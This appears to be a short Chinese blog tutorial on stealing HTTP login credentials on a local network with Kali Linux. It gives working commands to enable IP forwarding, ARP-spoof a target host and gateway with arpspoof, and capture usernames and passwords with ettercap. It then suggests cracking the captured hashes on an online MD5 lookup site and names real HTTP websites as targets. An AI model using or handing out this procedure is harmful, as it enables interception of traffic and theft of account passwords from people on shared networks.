利用kali嗅探HTTP網頁用戶賬戶密碼
嗅探HTTP網頁
一:測試基礎
1.ARP基礎:使用mac地址和ip地址進行通信的局域網協議
2.HTTP:一種上網、網頁請求通信協議。該協議以明文傳輸,即在傳輸時不對數據進行加密,因為http的不安全性,所以在局域網環境中,可以通過ARP欺騙,將目標主機的網絡數據包都流經攻擊者,然后再通過嗅探的方式從而獲取到HTTP的一些數據信息
3.Ettercap:一個kali自帶的中間人套件
二.實戰測試
1.路由轉發,確保目標主機正常上網(截獲到的流量發送出去)
echo 1 > /proc/sys/net/ipv4/ip_forward
提示權限不夠時輸入
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
2.ARP欺騙(欺騙目標,我就是網關)
arpspoof -i eth0 -t 192.168.1.183(目標靶機) 192.168.1.1(網關)
3.嗅探http登錄密碼
ettercap -Tq -i eth0
注:T代表文本形式輸出,q代表安靜模式,i指定網口
開始嗅探,然后靜靜地等待目標靶機上網,就能獲取目標在網頁中輸入的用戶名和密碼了
4.目標靶機上網並登錄
5.嗅探到賬號,密碼,訪問的網站
6.此時密碼是加密的,到www.cmd5.com去解密(直接輸入密文就自動解密了)
提示:這里僅僅獲取http類型的用戶登錄密碼,而現在主流是https協議,下一篇博文破解https,其實還有很多網站都是http的(比如www.4399.com)